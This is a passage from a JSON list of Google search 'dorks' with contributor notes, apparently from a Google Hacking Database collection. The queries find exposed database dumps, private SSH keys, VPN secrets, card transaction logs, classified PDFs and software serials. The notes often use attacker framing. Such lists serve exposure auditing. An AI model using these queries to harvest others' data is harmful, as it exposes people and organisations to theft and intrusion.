"\"# Dumping data for table\"", "description": "SQL database dumps. LOTS of data in these. So much data, infact, I'm pressed to think of what else an ev1l hax0r would like to know about a target database.. What's that? Usernames and passwords you say? Patience, grasshopper....."}, {"dork": "intitle:\"Index of\" dbconvert.exe chats", "description": "ICQ (http://www.icq.com) allows you to store the contents of your online chats into a file. These folks have their entire ICQ directories online. On purpose?"}, {"dork": "\"cacheserverreport for\" \"This analysis was produced by calamaris\"", "description": "These are squid server cache reports. Fairly benign, really except when you consider using them for evil purposes. For example, an institution stands up a proxy server for their internal users to get to the outside world. Then, the internal user surf all over to their hearts content (including intranet pages cuz well, the admins are stupid) Voila, intranet links show up in the external cache report. Want to make matters worse for yourself as an admin? OK, configure your external proxy server as a trusted internal host. Load up your web browser, set your proxy as their proxy and surf your way into their intranet. Not that I've noticed any examples of this in this google list. *COUGH* *COUGH* *COUGH* unresolved DNS lookups give clues *COUGH* *COUGH* ('scuse me. must be a furball) OK, lets say BEST CASE scenario. Let's say there's not security problems revealed in these logs. Best case scenario is that outsiders can see what your company/agency/workers are surfing."}, {"dork": "filetype: log inurl:\"access.log\" +intext:\"HTTP/1.1\"", "description": "Match some apache access.log files.\nAuthor: susmab"}, {"dork": "intext:db_pass inurl:settings.ini", "description": "Submitter: Bastich mysql.nimbit.com dashboard settings"}, {"dork": "filetype:ini \"Bootstrap.php\" (pass|passwd|password|pwd)", "description": "Zend application ini, with usernames, passwords and db info\nlove\nBastich"}, {"dork": "filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS", "description": "this dork locates registry dumps"}, {"dork": "Google Dork inurl:Curriculum Vitale filetype:doc ( Vital Informaticon , Addres, Telephone Numer, SSN , Full Name, Work , etc ) In Spanish.", "description": "This dork locates Curriculum Vitale files. Author: Luciano UNLP"}, {"dork": "Microsoft-IIS/7.0 intitle:index.of name size", "description": "IIS 7 directory listing. Author: huang"}, {"dork": "intext:\"~~Joomla1.txt\" title:\"Index of /\"", "description": "intext:\"~~Joomla1.txt\" title:\"Index of /\"\nGet all server configs files\nDiscovered by alsa7r"}, {"dork": "?intitle:index.of?\".mysql_history\"", "description": "Find some juicy info in .mysql_history files\nenjoy\nbastich"}, {"dork": "inurl:\"phpmyadmin/index.php\" intext:\"[ Edit ] [ Create PHP Code ] [ Refresh ]\"", "description": "This dork finds unsecured databases"}, {"dork": "filetype:avastlic", "description": "Lots of Avast Licenses .\nAuthor : gr00ve_hack3r\nwww.gr00vehack3r.wordpress.com"}, {"dork": "inurl:admin intext:username= AND email= AND password= OR pass= filetype:xls", "description": "-- \nnitish mehta"}, {"dork": "inurl:\"php?id=\" intext:\"DB_Error Object \"", "description": "Description: Files containing juicy info\nAuthor:ruben_linux"}, {"dork": "\"information_schema\" filetype:sql", "description": "Dork: \"information_schema\" filetype:sql\nBy: Cr4t3r"}, {"dork": "inurl:*/webalizer/* intitle:\"Usage Statistics\"", "description": "*Obrigado,*"}, {"dork": "site:github.com inurl:\"known_hosts\" \"ssh-rsa\"", "description": "Finds SSH known_hosts files on GitHub.\n- Andy G - twitter.com/vxhex"}, {"dork": "site:github.com inurl:\"id_rsa\" -inurl:\"pub\"", "description": "Finds private SSH keys on GitHub.\n- Andy G - twitter.com/vxhex"}, {"dork": "filetype:pdf \"acunetix website audit\" \"alerts summary\"", "description": "Finds reports generated by Acunetix scans.\n- Andy G - twitter.com/vxhex"}, {"dork": "filetype:sql site:gov and \"insert into\"", "description": "filetype:sql site:gov and \"insert into\" \nfind sql files with data on governments sites"}, {"dork": "(intext:mail AND intext:samAccountName) AND (filetype:xlsx OR filetype:xls OR filetype:csv OR filetype:txt)", "description": "Search for samAccountName (an ActiveDirectory attribute). 50/50 success, some usernames disclosed along with other information."}, {"dork": "ext:msg OR ext:eml site:gov OR site:edu", "description": "Mails leak by Rootkit."}, {"dork": "ext:log telnet intext:password", "description": "Telnet logs.\nBy Rootkit."}, {"dork": "filetype:mobileconfig intext:password OR intext:pass", "description": "filetype:mobileconfig intext:password OR intext:pass"}, {"dork": "ext:pem intext:BEGIN CERTIFICATE", "description": "Vulnerables CA files.\nBy Rootkit."}, {"dork": "intitle:index of /weekly cpbackup", "description": "useful for finding cpanel backups\n-- \nRegards,\nH.R."}, {"dork": "\"Futon on Apache\" inurl:_utils", "description": "Exposed CouchDB admin panels\nBy Gabor Szathmari"}, {"dork": "inurl:cgi-bin ext:pl intext:\"-rwxr-xr-x\"", "description": "List of Directories of Unix and Linux webs.\nEnjoy!.\nBy Rootkit."}, {"dork": "intext:bbdd index.of \"/\" \"Parent Directory\"", "description": "Databases directory info. Have Fun!\nRootkit."}, {"dork": "inurl:src/viewcvs.cgi/log/.c?=", "description": "Vulnerable CVS logs"}, {"dork": "intitle:Tomcat Status | inurl:/status?full=true", "description": "JBOSS / Tomcat Status IP info\n-Xploit"}, {"dork": "-inurl:http | -inurl:https inurl:ftp ext:xls | ext:xlsx bank", "description": "Lots of interesting stuff!\nDecoy"}, {"dork": "inurl:http | -inurl:https inurl:ftp ext:pdf taxreturn", "description": "Amazing what you find with this..\n-Chopin"}, {"dork": "inurl:haproxy-status site:example.com", "description": "Dork to find system info leaks using haproxy stats.\n- ivxenog"}, {"dork": "inurl:configfile.cgi", "description": "Google dork:\ninurl:configfile.cgi\nD0bby"}, {"dork": "filetype:txt \"gmail\" | \"hotmail\" | \"yahoo\" -robots site:gov | site:us", "description": "filetype:txt \"gmail\" | \"hotmail\" | \"yahoo\" -robots site:gov | site:us\nEmails"}, {"dork": "\"Index of /wp-content/uploads/backupbuddy_backups\" zip", "description": "Search for iThemes BackupBuddy backup zips\n\u2013 balcsida"}, {"dork": "inurl:\"/irclogs/\" ext:log", "description": "Finds people's IRC logs\nDxtroyer"}, {"dork": "\"Fatal NI connect error\" \", connecting to:\" ext:log", "description": "Finds a whole load of different application logs (with errors!)\nDxtroyer"}, {"dork": "\"Greenstone receptionist\" inurl:\"/etc/main.cfg\"", "description": "Finds web app configs\nDxtroyer"}, {"dork": "\"# This file was generated by libcurl! Edit at your own risk.\" ext:txt", "description": "Finds leftover cookie data, sometimes containing vulnerable information\n(often encrypted)\nDxtroyer"}, {"dork": "inurl:\"/fb_ca_chain_bundle.crt\" ext:crt", "description": "Finds security certificates left behind by Facebook, potentially having\nsome useful info.\nDxtroyer"}, {"dork": "inurl:\"/sitemap.xsd\" ext:xsd", "description": "Finds files leading to sitemaps... Useful for finding login portals and\nstuff.\nDxtroyer"}, {"dork": "\"SERVER_ADDR\" \"SERVER_PORT\" \"SERVER_NAME\" ext:log", "description": "Finds logs with server information!\nDxtroyer"}, {"dork": "\"%@\" ext:ascx", "description": "Finds ASP configs and settings\nDxtroyer"}, {"dork": "\"Logfile of Trend Micro HijackThis\" ext:log", "description": "Finds AV logs from Trend Micro\nDxtroyer"}, {"dork": "\"# AdwCleaner\" ext:txt", "description": "Finds AdwCleaner logfiles\nDxtroyer"}, {"dork": "\"InnoDB:\" ext:log", "description": "Finds MySQL error logs and the such\nDxtroyer"}, {"dork": "\"[dirs]\" inurl:\"mirc.ini\" -git", "description": "Finds mIRC configuration files\nDxtroyer"}, {"dork": "\"HTTP\" inurl:\"access.log\" ext:log", "description": "Finds logs which contain info about website activity\nDxtroyer"}, {"dork": "\"Section\" inurl:\"xorg.conf\" ext:conf -wiki", "description": "Config files for Xorg X, containing victim's computer information\nDxtroyer"}, {"dork": "\"PHP Fatal error: require()\" ext:log", "description": "Finds PHP error logs\nDxtroyer"}, {"dork": "\"SECRET//NOFORN\" ext:pdf", "description": "Finds secret government documents\nDxtroyer"}, {"dork": "\"KVP_ENCDATA:Version=1.0\" ext:log", "description": "Finds transaction logs with bank account info and (drumroll please) credit\ncard numbers!\nDxtroyer"}, {"dork": "inurl:\"idx_config\"", "description": "Finds grabbed config by shell (database,cpanel,smtp....)\nDork: inurl:\"idx_config\"\nShad Karim\nThanks to :Anon Defacer"}, {"dork": "\"START securepay\" ext:log", "description": "Finds transaction logs (sometimes containing credit card numbers and other\njuicy info!)\nDxtroyer"}, {"dork": "\"-----BEGIN X509 CERTIFICATE-----\" ext:pem -git", "description": "Finds X.509 server certificates\nDxtroyer"}, {"dork": "\"-- MySQL Administrator dump\" ext:sql", "description": "Finds some nice database dumps, potentially containing usernames,\npasswords, and other cool stuff!\nDxtroyer"}, {"dork": "\"Consola de Joomla! Debug\" inurl:index.php", "description": "Dork to find the Joomla Debug console that gives us the following\ninformation\n> Session\n> Profile Information\n> Memory usage\n> Database Registration\n\"Consola de Joomla! Debug\" inurl:index.php\nDrok3r"}, {"dork": "inurl:\"dcwp_twitter.php?1=\"", "description": "Finds Twitter API logs with private messages, encrypted credentials, and\nmore!\nDxtroyer"}, {"dork": "inurl:app/config/ intext:parameters.yml intitle:index.of", "description": "Category: Files Containing Passwords\nQuery: inurl:app/config/ intext:parameters.yml intitle:index.of\nTarget: Symfony (PHP Framework)\nContains:\n - database & e-mail credentials\n - secret"}, {"dork": "\"random's system information tool\" ext:txt", "description": "Finds logs from system info stealers\nDxtroyer"}, {"dork": "\"[FFFTP]\" ext:ini", "description": "Finds files with FTP logins, server info, and more!\nDxtroyer"}, {"dork": "inurl:\"/Windows/Cookies/\" ext:txt -telecom -forbidden -git", "description": "Finds cookies stored by Windows, potentially containing encrypted usernames\n& passwords\nDxtroyer"}, {"dork": "\"Protocol=unreal\" ext:ini -git", "description": "People are going to hate me for this :P\nFinds Unreal game files, potentially containing admin passwords\nDxtroyer"}, {"dork": "intext:uploadOverwrite || intext:OPEN || intext:cwd", "description": "-------------------------------------------------------------\nGoogle Dork: intext:uploadOverwrite || intext:OPEN || intext:cwd\nAuthor: Tarkan Catal X\nThis dork allows you to search for elFinder (https://studio-42.github.io/elFinder) log file.\nThis file contains ( hidden ) paths, directories, files and other juicy information.\n--------------------------------------------------------------"}, {"dork": "inurl:\"/logs/www\" ext:log", "description": "Finds connection logs, with user agents, errors, and more\nDxtroyer"}, {"dork": "\"Blocking Reason:\" ext:log -git", "description": "Finds security breach logs\nDxtroyer"}, {"dork": "\"You're successfully running JSON Server\"", "description": "*Google Dork :- \"You're successfully running JSON Server\"*\n*You can browse through files (username+password)*\n-- \nNEAM :- Helmi"}, {"dork": "\"TX_start\" \"card_name\" ext:log", "description": "Finds transaction logs from stores, containing juicy credit/debit card info.\nDxtroyer"}, {"dork": "inurl:\"wp-content/uploads/file-manager/log.txt\"", "description": "WordPress Plugin File Manager log file with interesting information.\nIng. Daniel Maldonado\nhttp://www.caceriadespammers.com.ar"}, {"dork": "\"-- Account dump\" ext:sql -git", "description": "Desc of Dork: Find juicy information on MySQL Dumps with the tag \n\"Account\".\n- SeekedNow"}, {"dork": "ext:log inurl:\"/pgadmin\"", "description": "pgAdmin client log files.\nIng. Daniel Maldonado\nhttp://www.caceriadespammers.com.ar/"}, {"dork": "inurl:/secure/attachment/ filetype:log OR filetype:txt", "description": "Files containing logs and bug reports of JIRA software development tool\nDheeraj\nhttps://github.com/dheeraj-rn/"}, {"dork": "inurl:/maint/repair.php?repair=1", "description": "Wordpress database repair displaying active tables\n- ThePentester"}, {"dork": "inurl:scan_result_file", "description": "Will produce a list of sites that have clamAV results, which could list\npotential backdoors installed that an attacker can use to gain access to a\nsite.\n-- \nColette Chamberland\nCISSP, C|EH, C|HFI"}, {"dork": "ext:csproj", "description": "*Summary:*\nA Google dork that gives the information about the IIS configurations,\nreferenced libraries and all included file paths in server (.cs files etc)\nfrom the target .NET web application.\n*Dork discovered by:*\nGoktug Serez\nhttps://endpoint-labs.com"}, {"dork": "ext:vbproj", "description": "*Category: *\nfiles containing juicy info\nweb server detection\nsensitive directories\n*Summary:*\nA Google dork that gives the information about the IIS configurations,\nreferenced libraries and all included file paths in server (.vb files etc)\nfrom the target Visual Basic .NET web application.\n*Dork discovered by:*\nGoktug Serez\nhttps://endpoint-labs.com"}, {"dork": "inurl:\".hg/store/fncache\"", "description": "hg repository dork\n@tahaSuleyman"}, {"dork": "filetype:tpl intext:mysql_connect", "description": "mysql_connect in php template files (db username and db password):\r\n\r\n\r\n\r\nfiletype:tpl intext:mysql_connect\r\n\r\n\r\n\r\n-al4r0"}, {"dork": "ext:asax", "description": "*Summary:*\nA Google dork that gives the information about target .NET web application\nand source code.\n*Dork discovered by:*\nGoktug Serez\nhttps://endpoint-labs.com"}, {"dork": "inurl:FileListAbsolute ext:txt", "description": "*Category:*\nweb server detection\nfiles containing juicy info\n*Summary:*\nA Google dork that gives the information about target web server's physical\npath\nand loaded DLLs.\n*Dork discovered by:*\nGoktug Serez\nhttps://endpoint-labs.com"}, {"dork": "\"OTL logfile\" \"by OldTimer\" ext:txt", "description": "Finds logs of OldTimer ListIt (main log): \"OTL logfile\" \"by OldTimer\" ext:txt\nFinds logs of OldTimer ListIt (extra log): \"OTL Extras logfile\" \"by OldTimer\" ext:txt\n-- \nDan Peretz"}, {"dork": "\"QuickDiag\" \"by g3n-h@ckm@n\" ext:txt", "description": "Finds logs of QuickDiag\n-- \nDan Peretz"}, {"dork": "ext:txt | ext:conf | ext:inc | ext:doc intext:php class JConfig", "description": "Joomla configuration files!\nAuthor: Augusto Pereira\nhttp://www.augustopereira.com.br"}, {"dork": "inurl:/Divi/Changelog.txt /Divi/Changelog.txt", "description": "*Category:*\nfiles containing juicy info\n*Summary:*\nA Google dork that gives the information about wordpress Divi plugin\nchangelog\n*Dork discovered by:*\nm0be1"}, {"dork": "intitle:\"AppServ Open Project\" -site:www.appservnetwork.com", "description": "AppServ is the Apache/PHP/MySQL open source software installer packages. This normally includes convenient links to phpMyAdmin and phpInfo() pages."}, {"dork": "intitle:index.of finances.xls", "description": "Hey! I have a great idea! Let's put our finances on our website in a secret directory so we can get to it whenever we need to!"}, {"dork": "intitle:\"Index of\" finance.xls", "description": "Hey! I have a great idea! Let's put our finances on our website in a secret directory so we can get to it whenever we need to!"}, {"dork": "intitle:index.of intext:.ssh", "description": "Find peoples ssh public and private keys\n- tmc / #havok"}, {"dork": "site:bitbucket.org inurl:.bash_history", "description": "Finding Sensitive data\nsite:bitbucket.org inurl:.bash_history\nBy Pharos"}, {"dork": "\"google confidential\" filetype:pdf", "description": "\"google confidential\" filetype:pdf\nGoogle leaking their own files"}, {"dork": "ext:txt inurl:gov intext:\"Content-Type: text/plain; charset=utf-8\" AND intext:\"Received: from \"", "description": "ext:txt inurl:gov intext:\"Content-Type: text/plain; charset=utf-8\" AND intext:\"Received: from \"\nDork to find gov't emails.\n~ Carl"}, {"dork": "filetype:pub inurl:ssh", "description": "This dork finds various SSH pub files.\nAuthor:NickiK."}, {"dork": "inurl:vidyo -site:vidyo.com inurl:portal", "description": "Vidyo Portals. File Disclosure\ninurl:vidyo -site:vidyo.com inurl:portal"}, {"dork": "buddylist.blt", "description": "These searches bring up common names for AOL Instant Messenger \"buddylists\". These lists contain screen names of your \"online buddies\" in Instant Messenger. Not that's not too terribly exciting or stupid unless you want to mess with someone's mind, and besides, some people make these public on purpose. The thing that's interesting are the files that get stored ALONG WITH buddylists. Often this stuff includes downloaded pictures, resumes, all sorts of things. This is really for the peepers out there, and it' possible to spend countless hours rifling through people's personal crap. Also try buddylist.blt, buddy.blt, buddies.blt."}, {"dork": "intitle:phpinfo \"PHP Version\"", "description": "this brings up sites with phpinfo(). There is SO much cool stuff in here that you just have to check one out for yourself! I mean full blown system versioning, SSL version, sendmail version and path, ftp, LDAP, SQL info, Apache mods, Apache env vars, *sigh* the list goes on and on! Thanks \"joe!\" =)"}, {"dork": "intitle:index.of robots.txt", "description": "The robots.txt file contains \"rules\" about where web spiders are allowed (and NOT allowed) to look in a website's directory structure. Without over-complicating things, this means that the robots.txt file gives a mini-roadmap of what's somewhat public and what's considered more private on a web site. Have a look at the robots.txt file itself, it contains interesting stuff.However, don't forget to check out the other files in these directories since they are usually at the top directory level of the web server!"}, {"dork": "\"This report was generated by WebLog\"", "description": "These are weblog-generated statistics for web sites... A roadmap of files, referrers, errors, statistics... yummy... a schmorgasbord! =P"}, {"dork": "\"These statistics were produced by getstats\"", "description": "Another web statistics package. This one originated from a google scan of an ivy league college. *sigh*There's sooo much stuff in here!"}, {"dork": "\"This summary was generated by wwwstat\"", "description": "More www statistics on the web. This one is very nice.. Lots of directory info, and client access statistics, email addresses.. lots os good stuff.You know, these are SOOO dangerous, especially if INTRANET users get logged... talk about mapping out an intranet quickly...thanks, sac =)"}, {"dork": "intitle:index.of haccess.ctl", "description": "this is the frontpage(?) equivalent of htaccess, I believe. Anyhow, this file describes who can access the directory of the web server and where the other authorization files are. nice find."}, {"dork": "filetype:ctl Basic", "description": "haccess.ctl is the frontpage(?) equivalent of the .htaccess file. Either way, this file decribes who can access a web page, and should not be shown to web surfers. Way to go, googledork. =PThis method is very reliable due to the use of this google query:filetype:ctl BasicThis pulls out the file by name then searches for a string inside of it (Basic) which appears in the standard template for this file."}, {"dork": "site:edu admin grades", "description": "I never really thought about this until I started coming up with juicy examples for DEFCON 11.. A few GLARINGLY bad examples contain not only student grades and names, but also social security numbers, securing the highest of all googledork ratings!"}, {"dork": "intitle:index.of mystuff.xml", "description": "This particular file contains web links that trillian users have entered into the tool. Trillian combines many different messaging programs into one tool. AIM, MSN, Yahoo, ICQ, IRC, etc. Although this particular file is fairly benign, check out the other files in the same directory. There is usually great stuff here!"}, {"dork": "\"# phpMyAdmin MySQL-Dump\" filetype:txt", "description": "From phpmyadmin.net : \"phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW.\" Great, easy to use, but don't leave your database dumps laying around on the web. They contain all SORTS of sensitive information..."}, {"dork": "\"# phpMyAdmin MySQL-Dump\" \"INSERT INTO\" -\"the\"", "description": "From phpmyadmin.net : \"phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW.\" Great, easy to use, but don't leave your database dumps laying around on the web. They contain all SORTS of sensitive information..."}, {"dork": "intitle:index.of cgiirc.config", "description": "CGIIRC is a web-based IRC client. Very cool stuff. The cgiirc.config file lists the options for this porgram, including the default sites that can be attached to, server passwords, and crypts of admin passwords. This file is for CGIIRC, not Google surfers!"}, {"dork": "inurl:cgiirc.config", "description": "This is another less reliable way of finding the cgiirc.config file. CGIIRC is a web-based IRC client. Very cool stuff. The cgiirc.config file lists the options for this porgram, including the default sites that can be attached to, server passwords, and crypts of admin passwords. This file is for CGIIRC, not Google surfers!"}, {"dork": "inurl:ipsec.secrets -history -bugs", "description": "from the manpage for ipsec_secrets: \"It is vital that these secrets be protected. The file should be owned by the super-user, and its permissions should be set to block all access by others.\" So let's make it plain: DO NOT SHOW THIS FILE TO ANYONE! Googledorks rejoice, these files are on the web!"}, {"dork": "inurl:ipsec.secrets \"holds shared secrets\"", "description": "from the manpage for ipsec_secrets: \"It is vital that these secrets be protected. The file should be owned by the super-user, and its permissions should be set to block all access by others.\" So let's make it plain: DO NOT SHOW THIS FILE TO ANYONE! Googledorks rejoice, these files are on the web!"}, {"dork": "inurl:ipsec.conf -intitle:manpage", "description": "The ipsec.conf file could help hackers figure out what uber-secure users of freeS/WAN are protecting...."}, {"dork": "intitle:\"statistics of\" \"advanced web statistics\"", "description": "the awstats program shows web statistics for web servers. This information includes who is visiting the site, what pages they visit, error codes produced, filetypes hosted on the server, number of hits, and more which can provide very interesting recon information for an attacker."}, {"dork": "intitle:\"Usage Statistics for\" \"Generated by Webalizer\"", "description": "The webalizer program shows web statistics for web servers. This information includes who is visiting the site, what pages they visit, error codes produced, filetypes hosted on the server, number of hits, referrers, exit pages, and more which can provide very interesting recon information for an attacker."}, {"dork": "\"robots.txt\" \"Disallow:\" filetype:txt", "description": "The robots.txt file serves as a set of instructions for web crawlers. The \"disallow\" tag tells a web crawler where NOT to look, for whatever reason. Hackers will always go to those places first!"}, {"dork": "\"phpMyAdmin\" \"running on\" inurl:\"main.php\"", "description": "From phpmyadmin.net : \"phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW.\" Great, easy to use, but lock it down! Things you can do include viewing MySQL runtime information and system variables, show processes, reloading MySQL, changing privileges, and modifying or exporting databases. Hacker-fodder for sure!"}, {"dork": "inurl:main.php phpMyAdmin", "description": "From phpmyadmin.net : \"phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW.\" Great, easy to use, but lock it down! Things you can do include viewing MySQL runtime information and system variables, show processes, reloading MySQL, changing privileges, and modifying or exporting databases. Hacker-fodder for sure!"}, {"dork": "inurl:main.php Welcome to phpMyAdmin", "description": "From phpmyadmin.net : \"phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW.\" Great, easy to use, but lock it down! Things you can do include viewing MySQL runtime information and system variables, show processes, reloading MySQL, changing privileges, and modifying or exporting databases. Hacker-fodder for sure!"}, {"dork": "intitle:\"wbem\" compaq login \"Compaq Information Technologies Group\"", "description": "These devices are running HP Insight Management Agents for Servers which \"provide device information for all managed subsystems. Alerts are generated by SNMP traps.\" The information on these pages include server addresses and other assorted SNMP information."}, {"dork": "intitle:index.of \"Apache\" \"server at\"", "description": "This is a very basic string found on directory listing pages which show the version of the Apache web server. Hackers can use this information to find vulnerable targets without querying the servers."}, {"dork": "intitle:index.of dead.letter", "description": "dead.letter contains the contents of unfinished emails created on the UNIX platform. Emails (finished or not) can contain sensitive information."}, {"dork": "intitle:index.of ws_ftp.ini", "description": "ws_ftp.ini is a configuration file for a popular FTP client that stores usernames, (weakly) encoded passwords, sites and directories that the user can store for later reference. These should not be on the web!"}, {"dork": "inurl:admin intitle:login", "description": "This search can find administrative login pages. Not a vulnerability in and of itself, this query serves as a locator for administrative areas of a site. Further investigation of the surrounding directories can often reveal interesting information."}, {"dork": "intitle:admin intitle:login", "description": "This search can find administrative login pages. Not a vulnerability in and of itself, this query serves as a locator for administrative areas of a site. Further investigation of the surrounding directories can often reveal interesting information."}, {"dork": "inurl:admin filetype:xls", "description": "This search can find Excel spreadsheets in an administrative directory or of an administrative nature. Many times these documents contain sensitive information."}, {"dork": "\"Most Submitted Forms and Scripts\" \"this section\"", "description": "More www statistics on the web. This one is very nice.. Lots of directory info, and client access statistics, email addresses.. lots of good stuff.These are SOOO dangerous, especially if INTRANET users get logged... talk about mapping out an intranet quickly..."}, {"dork": "inurl:changepassword.asp", "description": "This is a common script for changing passwords. Now, this doesn't actually reveal the password, but it provides great information about the security layout of a server. These links can be used to troll around a website."}, {"dork": "\"not for distribution\" confidential", "description": "The terms \"not for distribution\" and confidential indicate a sensitive document. Results vary wildly, but web-based documents are for public viewing, and should neither be considered confidential or private."}, {"dork": "\"Thank you for your order\" +receipt", "description": "After placing an order via the web, many sites provide a page containing the phrase \"Thank you for your order\" and provide a receipt for future reference. At the very least, these pages can provide insight into the structure of a web-based shop."}, {"dork": "\"Network Vulnerability Assessment Report\"", "description": "This search yeids vulnerability scanner reports, revealing potential vulnerabilities on hosts and networks. Even if some of the vulnerabilities have been fixed, information about the network/hosts can still be gleaned."}, {"dork": "\"Host Vulnerability Summary Report\"", "description": "This search yeids host vulnerability scanner reports, revealing potential vulnerabilities on hosts and networks. Even if some of the vulnerabilities have been fixed, information about the network/hosts can still be gleaned."}, {"dork": "intitle:index.of inbox", "description": "This search reveals potential location for mailbox files. In some cases, the data in this directory or file may be of a very personal nature and may include sent and received emails and archives of email data."}, {"dork": "intitle:index.of inbox dbx", "description": "This search reveals potential location for mailbox files. In some cases, the data in this directory or file may be of a very personal nature and may include sent and received emails and archives of email data."}, {"dork": "intitle:index.of inbox dbx", "description": "This search reveals potential location for mailbox files by keying on the Outlook Express cleanup.log file. In some cases, the data in this directory or file may be of a very personal nature and may include sent and received emails and archives of email data."}, {"dork": "\"#mysql dump\" filetype:sql", "description": "This reveals mySQL database dumps. These database dumps list the structure and content of databases, which can reveal many different types of sensitive information."}, {"dork": "inurl:vbstats.php \"page generated\"", "description": "This is your typical stats page listing referrers and top ips and such. This information can certainly be used to gather information about a site and its visitors."}, {"dork": "\"Index of\" / \"chat/logs\"", "description": "This search reveals chat logs. Depending on the contents of the logs, these files could contain just about anything!"}, {"dork": "inurl:\"newsletter/admin/\" intitle:\"newsletter admin\"", "description": "These pages generally contain newsletter administration pages. Some of these site are password protected, others are not, allowing unauthorized users to send mass emails to an entire mailing list."}, {"dork": "inurl:\"newsletter/admin/\"", "description": "These pages generally contain newsletter administration pages. Some of these site are password protected, others are not, allowing unauthorized users to send mass emails to an entire mailing list. This is a less acurate search than the similar intitle:\"newsletter admin\" search."}, {"dork": "allinurl:servlet/SnoopServlet", "description": "These pages reveal server information such as port, server software version, server name, full paths, etc."}, {"dork": "\"Running in Child mode\"", "description": "This is a gnutella client that was picked up by google. There is a lot of data present including transfer statistics, port numbers, operating system, memory, processor speed, ip addresses, and gnutella client versions."}, {"dork": "\"This is a Shareaza Node\"", "description": "These pages are from Shareaza client programs. Various data is displayed including client version, ip address, listening ports and uptime."}, {"dork": "inurl:server-status \"apache\"", "description": "This page shows all sort of information about the Apache web server. It can be used to track process information, directory maps, connection data, etc."}, {"dork": "inurl:fcgi-bin/echo", "description": "This is the fastcgi echo script, which provides a great deal of information including port numbers, server software versions, port numbers, ip addresses, path names, file names, time zone, process id's, admin email, fqdns, etc!"}, {"dork": "inurl:cgi-bin/printenv", "description": "This is the print environemnts script which lists sensitive information such as path names, server names, port numbers, server software and version numbers, administrator email addresses and more."}, {"dork": "inurl:perl/printenv", "description": "This is the print environemnts script which lists sensitive information such as path names, server names, port numbers, server software and version numbers, administrator email addresses and more."}, {"dork": "inurl:server-info \"Apache Server Information\"", "description": "This is the Apache server-info program. There is so much sensitive stuff listed on this page that it's hard to list it all here. Some informatino listed here includes server version and build, software versions, hostnames, ports, path info, modules installed, module info, configuration data and so much more...."}, {"dork": "intext:\"Tobias Oetiker\" \"traffic analysis\"", "description": "This is the MRTG traffic analysis pages. This page lists information about machines on the network including CPU load, traffic statistics, etc. This information can be useful in mapping out a network."}, {"dork": "inurl:tdbin", "description": "This is the default directory for TestDirector (http://www.mercuryinteractive.com/products/testdirector/). This program contains sensitive information including software defect data which should not be publically accessible."}, {"dork": "inurl:\"smb.conf\" intext:\"workgroup\" filetype:conf", "description": "These are samba configuration files. They include information about the network, trust relationships, user accounts and much more. Attackers can use this information to recon a network."}, {"dork": "filetype:conf inurl:firewall -intitle:cvs", "description": "These are firewall configuration files. Although these are often examples or sample files, in many cases they can still be used for information gathering purposes."}, {"dork": "\"HTTP_FROM=googlebot\" googlebot.com \"Server_Software=\"", "description": "These pages contain trace information that was collected when the googlebot crawled a page. The information can include many different things such as path names, header information, server software versions and much more. Attackers can use information like this to formulate an attack against a site."}, {"dork": "\"Request Details\" \"Control Tree\" \"Server Variables\"", "description": "These pages contain a great deal of information including path names, session ID's, stack traces, port numbers, ip addresses, and much much more. Attackers can use this information to formulate a very advanced attack against these targets."}, {"dork": "filetype:wab wab", "description": "These are Microsoft Outlook Mail address books. The information contained will vary, but at the least an attacker can glean email addresses and contact information."}, {"dork": "filetype:mbx mbx intext:Subject", "description": "These searches reveal Outlook v 1-4 or Eudora mailbox files. Often these are made public on purpose, sometimes they are not. Either way, addresses and email text can be pulled from these files."}, {"dork": "filetype:eml eml +intext:\"Subject\" +intext:\"From\"", "description": "These are oulook express email files which contain emails, with full headers. The information in these emails can be useful for information gathering about a target."}, {"dork": "filetype:lic lic intext:key", "description": "License files for various software titles that may contain contact info and the product version, license, and registration in a .LIC file."}, {"dork": "filetype:log cron.log", "description": "Displays logs from cron, the *nix automation daemon. Can be used to determine backups, full and realtive paths, usernames, IP addresses and port numbers of trusted network hosts, or just about anything the admin of the box decides to automate. An attacker could use this information to possibly determine what extra vulnerable services are running on the machine, to find the location of backups, and, if the sysadmin uses cron to backup their logfiles, this cron log will give that away too."}, {"dork": "filetype:log access.log -CVS", "description": "These are http server access logs which contain all sorts of information ranging from usernames and passwords to trusted machines on the network to full paths on the server. Could be VERY useful in scoping out a potential target."}, {"dork": "filetype:blt blt +intext:screenname", "description": "Reveals AIM buddy lists, including screenname and who's on their 'buddy' list and their 'blocked' list."}, {"dork": "intitle:intranet inurl:intranet +intext:\"phone\"", "description": "These pages are often private intranet pages which contain phone listings and email addresses. These pages can be used as a sort of online \"dumpster dive\"."}, {"dork": "inurl:php.ini filetype:ini", "description": "The php.ini file contains all the configuration for how PHP is parsed on a server. It can contain default database usernames, passwords, hostnames, IP addresses, ports, initialization of global variables and other information. Since it is found by default in /etc, you might be able to find a lot more unrelated information in the same directory."}, {"dork": "\"Mecury Version\" \"Infastructure Group\"", "description": "Mecury is a centralized ground control program for research satellites. This query simply locates servers running this software. As it seems to run primarily on PHP and MySQL, there are many possible vulnerabilities associated with it."}, {"dork": "inurl:forward filetype:forward -cvs", "description": "Users on *nix boxes can forward their mail by placing a .forward file in their home directory. These files reveal email addresses."}, {"dork": "94FBR \"ADOBE PHOTOSHOP\"", "description": "94FBR is part of many serials. An malicious user would only have to change the programm name (photoshop in this example) in this search to find a perfectly valid serial.Other values to look for are: GC6J3. GTQ62. FP876. D3DX8."}, {"dork": "filetype:ctt ctt messenger", "description": "MSN Messenger uses the file extension *.ctt when you export the contact list. An attacker could use this for social enginering tricks."}, {"dork": "filetype:conf inurl:unrealircd.conf -cvs -gentoo", "description": "Development of UnrealIRCd began in 1999. Unreal was created from the Dreamforge IRCd that was formerly used by the DALnet IRC Network and is designed to be an advanced IRCd. Unreal can run on several operating systems. Unreal works on most *nix OSes including Linux, BSD, MacOS X, Solaris, and HP-UX. Unreal also works on Windows (95/98/ME NT4/2K/XP/2003).This search finds configuration files to Unreal IRCd. An attacker can use these to possibly determine the oper passwd. Be warned that there are samples in the results."}, {"dork": "inurl:/public/?Cmd=contents", "description": "This search looks for Outlook Web Access Public Folders directly. These links open public folders or appointments. Of course there are more ways to find OWA, but the results from this search are different, it just depends which link Google has crawled.An 